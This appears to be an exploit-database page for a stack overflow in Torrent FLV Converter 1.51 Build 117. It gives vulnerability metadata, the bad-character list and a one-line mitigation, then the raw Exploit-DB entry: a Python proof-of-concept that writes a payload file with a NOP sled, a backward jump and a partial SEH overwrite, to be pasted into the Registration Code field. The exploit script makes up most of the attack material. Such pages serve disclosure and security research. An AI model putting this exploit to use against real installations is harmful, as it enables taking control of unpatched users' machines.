Torrent FLV Converter 1.51 Build 117 - Stack Oveflow (SEH partial overwrite)

vendor:

Torrent FLV Converter

by:

antonio

7.8

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Torrent FLV Converter

Affected Version From: 1.51 Build 117

Affected Version To: 1.51 Build 117

Patch Exists: NO

Related CWE: N/A

CPE: a:torrentrockyou:torrent_flv_converter

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 SP1 32-bit

2020

Torrent FLV Converter 1.51 Build 117 – Stack Oveflow (SEH partial overwrite)

Torrent FLV Converter 1.51 Build 117 is vulnerable to a stack overflow vulnerability due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted input to the Registration Code input field, which can lead to a partial overwrite of the SEH handler. The bad characters for this exploit are 0x00, 0x0a, 0x0d, 0x80, 0xf0-x0ff, 0xe0-0x0ef, 0x70-0x7a, 0x61-0x6f, 0x9a, 0x9c, 0x9e.

Mitigation:

The vendor should ensure proper bounds checking of user-supplied input to prevent stack overflow vulnerabilities.

Source

Exploit-DB raw data:

# Exploit Title: Torrent FLV Converter 1.51 Build 117 - Stack Oveflow (SEH partial overwrite)
# Date: 2020-01-16
# Exploit Author: antonio
# Vendor Homepage: http://www.torrentrockyou.com/
# Software Link: http://www.torrentrockyou.com/download/trflvconverter.exe
# Version: 1.51 Build 117
# Tested on: Windows 7 SP1 32-bit

# Copy paste the contents of poc.txt into the
# Registration Code input field.

#!/usr/bin/python

nseh_offset = 4500
total = 5000

# badchars
# --------
# 0x00, 0x0a, 0x0d, 0x80
# 0xf0-x0ff, 0xe0-0x0ef, 0x70-0x7a
# 0x61-0x6f, 0x9a, 0x9c, 0x9e

poc = ""
poc += "A"*(nseh_offset - 53)
poc += "\x90"*53
poc += "\x7d\xcb\x90\x90" # jump backwards to NOPs: jge via SF = OF
poc += "\x7f\xb3\x45" # nseh pop pop ret: 3-byte partial overwrite

file = open("poc_seh.txt","w")
file.write(poc)
file.close()